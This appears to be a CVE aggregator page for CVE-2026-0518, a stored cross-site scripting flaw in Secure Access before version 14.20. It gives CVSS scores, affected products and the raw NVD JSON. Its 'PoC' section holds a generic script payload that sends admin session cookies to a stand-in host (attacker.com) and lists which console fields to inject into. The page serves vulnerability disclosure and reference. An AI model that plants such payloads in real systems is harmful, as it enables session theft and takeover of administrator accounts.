Security Vulnerability Report
CVE-2026-0518 CVSS 4.8 MEDIUM

CVE-2026-0518

Published: 2026-01-17 02:15:49
Last Modified: 2026-02-02 16:03:48

Description

CVE-2026-0518 is a cross-site scripting vulnerability in versions of Secure Access prior to 14.20. An attacker with administrative privileges can interfere with another administrator’s use of the console.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:* - VULNERABLE
NetMotion Secure Access < 14.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-0518 PoC - Stored XSS in NetMotion Secure Access
// Note: Requires administrator privileges
// This PoC demonstrates the XSS vulnerability in the admin console
// The attacker injects malicious JavaScript that executes when another admin views the page

// Example malicious payload that could be injected:
var poc_payload = `
<script>
// Steal session cookies
document.location='https://attacker.com/steal?cookie='+document.cookie;
// Or perform actions on behalf of the admin
fetch('https://attacker.com/log?data='+btoa(document.cookie));
</script>
`;

// In practice, the attacker would inject this via:
// 1. Admin console settings/configuration fields
// 2. User management fields
// 3. Policy configuration areas
// 4. Any field that doesn't properly sanitize input

// When another administrator accesses the affected page,
// the script executes in their browser context

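References

https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0518 (Vendor Advisory)
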
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0518", "sourceIdentifier": "[email protected]", "published": "2026-01-17T02:15:49.470", "lastModified": "2026-02-02T16:03:47.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2026-0518 is a cross-site scripting vulnerability in versions of \nSecure Access prior to 14.20. An attacker with administrative privileges\n can interfere with another administrator’s use of the console."}, {"lang": "es", "value": "CVE-2026-0518 es una vulnerabilidad de cross-site scripting en versiones de Secure Access anteriores a la 14.20. Un atacante con privilegios administrativos puede interferir con el uso de la consola por parte de otro administrador."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.20", "matchCriteriaId": "0037723E-6D5A-4D4C-91CC-7EB085C4CF61"}]}]}], "references": [{"url": "https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-0518", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}